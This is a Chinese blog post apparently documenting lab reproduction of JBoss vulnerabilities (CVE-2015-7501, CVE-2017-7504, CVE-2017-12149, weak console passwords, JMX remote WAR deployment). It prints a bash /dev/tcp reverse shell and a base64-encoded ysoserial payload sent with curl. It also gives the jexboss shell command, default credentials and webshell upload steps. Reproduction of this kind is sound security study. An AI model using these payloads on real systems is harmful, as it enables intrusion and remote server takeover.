Jboss 漏洞复现

于 2024-09-22 16:48:16 发布
阅读量770 收藏 19
点赞数 10
文章标签: jboss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80402555/article/details/142437932
版权

1、CVE-2015-7501

1、漏洞复现

http://47.121.212.195:8080

2、POC,访问地址

47.121.212.195:8080/invoker/JMXInvokerServlet

返回如下,说明接⼝开放,此接⼝存在反序列化漏洞

3、下载 ysoserial ⼯具进⾏漏洞利⽤
https://github.com/frohoff/ysoserial
将反弹shell进⾏base64编码
bash -i >& /dev/tcp/47.121.212.195/6666 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMjEyLjE5NS82NjY2IDA+JjE=

java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMjEyLjE5NS82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}">exp.ser

4、监听端口

5、执行命令

curl 47.121.212.195:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

6、反弹成功

2、CVE-2017-7504

1、访问漏洞地址

47.121.212.195:8080/jbossmq-httpil/HTTPServerILServlet

2、获取shell

python3 jexboss.py -u http://47.121.212.195:8080

3、CVE-2017-12149

1、验证是否存在漏洞 , 访问

http://47.121.212.195:8080/invoker/readonly

该漏洞出现在/invoker/readonly中 ,服务器将⽤户post请求内容进⾏反序列化

返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞

2、使⽤⼯具进⾏检测 DeserializeExploit 如果成功直接上传webshell即可:
⼯具:
https://cdn.vulhub.org/deserialization/DeserializeExploit.jar
也可以直接执⾏命令: https://github.com/yunxu1/jboss-_CVE-2017-12149

4、Administration Console弱⼝令

1、密码⽂件

/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties

账户密码:admin:vulhub

2、http://47.121.212.195:8080/admin-console/login.seam

3、登陆后台 admin/vulhub

4、点击web应用

5、上传后台1.war

6、使用工具连接

5、⾼版本JMX Console未授权

http://47.121.212.195:8080/jmx-console/

因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub

1、本地搭建部署点

在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer,如下

2、进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署

3、搭建远程部署 , 部署远程war包地址

4、输⼊Invoke

http://47.121.212.195/cmd.war

5、使用工具连接

6、低版本JMX Console未授权

1、

2、找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)

3、找到⻚⾯中的void addURL() 选项远程加载war包来部署。

4、制作war包 填写war包远程地址

5、工具连接

L黎蕊
关注
网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
weixin_54626591的博客
05-06 245
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
jboss --- 漏洞复现ysoserial工具
代码审计
04-27 1305
这里写目录标题 ssh 代理转发 访问物理机中的3388端口 就相当于访问虚拟机bihuo java中的 3389端口
jboss漏洞复现
Shanfenglan's blog
11-23 1020
文章目录什么是jboss1. JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)原理利用2. JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)原理利用参考文章 什么是jboss java中间件,类似于weblogic,webSphere等。可以理解成是一个加强版的可以实现EJB的tomcat。它的内部集成了tomcat对servlet处理的功能,而且支持EJB,不过weblogic的性能几乎全优于它,基本可以用weblogic代替。 1. JBos
JBoss 漏洞复现
m0_43397796的博客
03-02 4085
JBoss 漏洞复现 CVE-2017-12149 JBoss AS 5.X/6.X反序列化漏洞 漏洞扫描 试验地址:https://www.hetianlab.com/expc.do?w=exp_ass&ec=ECIDb56f-ab5c-4e92-840f-d59299ec273f 由于实验指导书上的ip有错误,所以先nmap扫描一下ipnmap -sn 10.1.1.0/24 发现4个ip 全端口扫描nmap -p- -sV -T4 10.1.1.254 10.1.1.135 10.1.1.9
Jboss漏洞复现(附带修复方法)
最新发布
C233333235的博客
08-07 1267
JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中 免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼ 服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域, JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发, 这使得JBoss⼴为流⾏。
jboss反序列化漏洞复现(CVE-2017-7504)
WY92139010的博客
07-31 601
jboss反序列化漏洞复现(CVE-2017-7504) 一、漏洞描述 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 二、漏洞环境搭建以及复现 1、使用docker搭建漏洞环境...
CVE-2017-12149JBOSS漏洞复现
ranuy阮的博客
05-07 1839
漏洞描述 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据...
JBoss系列漏洞复现以及实战心得
jammny
09-10 2009
前言 jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 谷歌语法:inurl:/console/ intitle:"JBoss Management" 一、JBoss JMXInvokerServlet 反序列化漏洞 JBoss在.
JBoss漏洞复现(保姆级教学)
m0_69043895的博客
04-25 729
漏洞原理:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。访问http://192.10.131.8:8080/invoker/readonly,若返回如下界面则存在漏洞。这个时候,可以通过执行命令在kali上反弹shell,需要将命令进行base64编码。在自己服务器上部署一个webshell的war包。然后再压缩成war文件。
jboss中间件漏洞复现
mingyqf的博客
02-15 1477
参考:https://blog.csdn.net/cj_Allen/article/details/109522771 JBOSS简介 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于J
中间件漏洞 -- JBoss
weixin_44769042的博客
11-17 4493
中间件漏洞记录--5 jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。默认端口:8080,9990 目录 一、JBoss JMXInvokerServlet 反序列化漏洞 1、环境搭建:docker + vulh...
JBoss漏洞总结复现
1ance's blog
10-08 2383
目录简介JBoss发序列化漏洞(CVE-2017-12149)漏洞描述漏洞原理影响范围漏洞复现修复建议JBossMQ JMS反序列化漏洞(CVE-2017-7504)漏洞描述漏洞原理影响范围复现过程修复建议JBoss JMXInvokerServlet反序列化漏洞(CVE-2015-7501)漏洞描述漏洞原理影响范围复现过程修复建议JBoss EJBInvokerServlet 反序列化漏洞(CVE-2013-4810)漏洞描述影响范围复现过程修复建议总结 简介 Jboss是一个基于J2EE的开放源代码的
漏洞复现JBoss漏洞总结
qq_45751902的博客
10-31 1731
如果部署成功,就可以打开包页面,假设刚才上传的包名为shell.war,所以要打开:8080/shell/,然后就会看到包里面的内容,如果里面有一个名为hack.jsp的木马,那么我们就可以打开:8080/shell/hack.jsp,然后连接即可。打开后找到addurl栏,这里有两个栏,一个是java.net.url,另一个是java.net.string,似乎不管是那个都可以。其实原理和上面的方法是一样的,就是生成一个序列化的数据然后发送报文,让其自动反序列化,只不过反弹的语句可控。
jboss常见漏洞复现
可爱的我可爱的code
11-19 809
JBoss 5.x/6.x 反序列化漏洞( CVE-2017-12149 ) 验证: 访问/invoker/readonly,如果返回 500 ,说明页面存在,此页面存在反序列化漏洞。 利用工具:JavaDeserH2HC 步骤: 1.先编译 # 我们选择一个 Gadget : ReverseShellCommonsCollectionsHashMap ,编译并生成序列化数据 javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsColl
JBoss 相关漏洞复现及利用
weixin_45908624的博客
09-21 1253
JBoss Application Server 相关漏洞复现
vulhub漏洞复现-jboss反序列化漏洞复现
weixin_45095113的博客
12-21 721
vulhub漏洞复现-jboss反序列化漏洞
tomcat weblogic jboss 漏洞
12-16
在互联网上,Tomcat、WebLogic和Jboss都是常见的应用服务器。由于它们在网站和应用中的广泛使用,这些服务器可能会存在漏洞。在过去的几年中,这些应用服务器都曾发生过漏洞事件。 Tomcat是一个由Apache基金会开发的开源Java Servlet容器,它可用于部署和管理Java应用程序。在过去,Tomcat曾经发生过一些安全漏洞,例如路径遍历漏洞和身份验证绕过漏洞。这些漏洞有可能导致黑客可以利用Tomcat服务器来执行恶意代码或窃取敏感信息。 WebLogic是Oracle公司开发的企业级Java应用服务器,供企业用于构建和部署企业级应用程序。在过去,WebLogic也曾发生过一些漏洞事件,例如XMLDecoder漏洞和未经授权的远程攻击漏洞。这些漏洞可能会导致黑客远程控制服务器或获取敏感数据。 Jboss是一款开源的Java应用服务器,它广泛用于企业级应用程序的构建和部署。过去,Jboss也存在过一些漏洞,比如JMX控制台未授权访问漏洞和远程代码执行漏洞。这些漏洞可能会被利用来执行恶意操作和窃取数据。 为了防止这些漏洞对系统造成危害,用户应该及时安装官方发布的补丁和更新,加强服务器的安全配置,限制对服务器的访问权限,定期进行安全审计和漏洞扫描。同时,开发人员也应该编写健壮安全的代码,以减少在应用程序中发现漏洞的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值